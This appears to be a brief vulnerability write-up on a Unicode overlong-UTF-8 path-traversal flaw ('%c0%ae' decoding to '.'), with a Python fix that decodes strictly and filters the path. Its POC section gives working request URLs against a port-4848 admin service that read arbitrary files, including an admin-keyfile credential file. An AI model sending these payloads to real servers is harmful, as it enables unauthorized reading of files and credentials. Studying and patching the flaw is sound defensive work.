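# Essence

A Unicode encoding flaw gives the same code multiple interpretations, which causes the operating system to parse it incorrectly. Typical case: `%c0%ae` is recognized as `.`
Reference: https://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode#Description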

# POC

…/%c0%ae%c0%ae/%c0%ae%c0%ae/……
This can be used to read arbitrary files.
One vulnerable endpoint:
Construct http://xxx.xx.xxx.xxx:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/

Then request http://xxx.xx.xxx.xxx:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Users/Administrator/Desktop/setup.nsi

Other cases:
http://192.168.147.148:4848/theme/META-INF/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./domains/domain1/config/admin-keyfile

# Fix

Filter the string after Unicode decoding so that "." and "/" cannot appear.
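
One way to apply this fix, as an added example that is not part of the original page: decode the request path once with a strict UTF-8 decoder (which rejects the `C0` lead byte outright), then filter the decoded string. The names `lenient_decode`, `safe_relative_path` and `RejectedPath` are hypothetical, `lenient_decode` is a simplified model of the flaw rather than any server's real code, and the filter rejects dot segments instead of every `.` so that ordinary file names still pass.

```python
from urllib.parse import unquote_to_bytes


class RejectedPath(ValueError):
    """The request path is malformed or tries to leave the served directory."""


def lenient_decode(raw: bytes) -> str:
    """Simplified model of the flaw (an assumption, not real server code):
    a 2-byte decoder that checks neither for overlong forms nor for a valid
    continuation byte, so C0 AE and C0 2E both come out as '.'."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def safe_relative_path(encoded: str) -> str:
    """Percent-decode once, decode UTF-8 strictly, then filter the result."""
    raw = unquote_to_bytes(encoded)
    try:
        text = raw.decode("utf-8", errors="strict")  # C0/C1 lead bytes are invalid
    except UnicodeDecodeError as exc:
        raise RejectedPath("invalid or overlong UTF-8") from exc
    # A leftover '%' means the input was encoded twice; refuse to decode again.
    if any(ch in text for ch in ("\x00", "\\", "%")):
        raise RejectedPath("unexpected character after decoding")
    # Empty segments cover a leading '/' and '//'.
    if any(seg in ("", ".", "..") for seg in text.split("/")):
        raise RejectedPath("dot or empty path segment")
    return text


if __name__ == "__main__":
    # Constructed sample inputs, relative to a hypothetical served directory.
    for sample in ("META-INF/css/style.css", "META-INF/%c0%ae%c0%ae/x",
                   "META-INF/%c0.%c0./x", "a/%2e%2e/b", "a/%252e%252e/b"):
        try:
            print("allow ", safe_relative_path(sample))
        except RejectedPath as why:
            print("reject", sample, "->", why)
```

The returned path should still be joined to the served directory and checked to resolve inside it before any file is opened.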

# Websites

Look up an IP or domain: http://www.webscan.cc/